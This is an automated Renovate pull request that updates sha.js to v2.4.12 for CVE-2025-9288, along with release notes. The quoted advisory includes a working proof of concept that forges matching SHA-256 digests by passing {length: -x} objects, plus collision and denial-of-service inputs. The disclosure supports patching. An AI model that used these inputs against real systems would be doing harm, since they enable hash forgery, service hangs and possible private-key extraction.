Update dependency sha.js to v2.4.12 [SECURITY] - autoclosed

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
sha.js	2.4.10 -> 2.4.12

GitHub Vulnerability Alerts

CVE-2025-9288

Summary

This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.

Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

Details

See PoC

PoC

const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe

Or just:

> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'

Impact

1. Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
2. Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 }
   This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
3. DoS on {length:'1e99'}
4. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

---

Release Notes

crypto-browserify/sha.js (sha.js)

v2.4.12

Compare Source

Commits

• [eslint] switch to eslint 7acadfb
• [meta] add auto-changelog b46e711
• [eslint] fix package.json indentation df9d521
• [Tests] migrate from travis to GHA c43c64a
• [Fix] support multi-byte wide typed arrays f2a258e
• [meta] reorder package.json d8d77c0
• [meta] add npmignore 35aec35
• [Tests] avoid console logs 73e33ae
• [Tests] fix tests run in batch 2629130
• [Tests] drop node requirement to 0.10 00c7f23
• [Dev Deps] update buffer, hash-test-vectors, standard, tape, typedarray 92b5de5
• [Tests] drop node requirement to v3 9b5eca8
• [meta] set engines to >= 4 807084c
• Only apps should have lockfiles c72789c
• [Deps] update inherits, safe-buffer 5428cfc
• [Dev Deps] update @ljharb/eslint-config 2dbe0aa
• update README to reflect LICENSE 8938256
• [Dev Deps] add missing peer dep d528896
• [Dev Deps] remove unused buffer dep 94ca724

v2.4.11

Compare Source

Merged

• Project is bound by MIT AND BSD-3-Clause licenses. #55

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.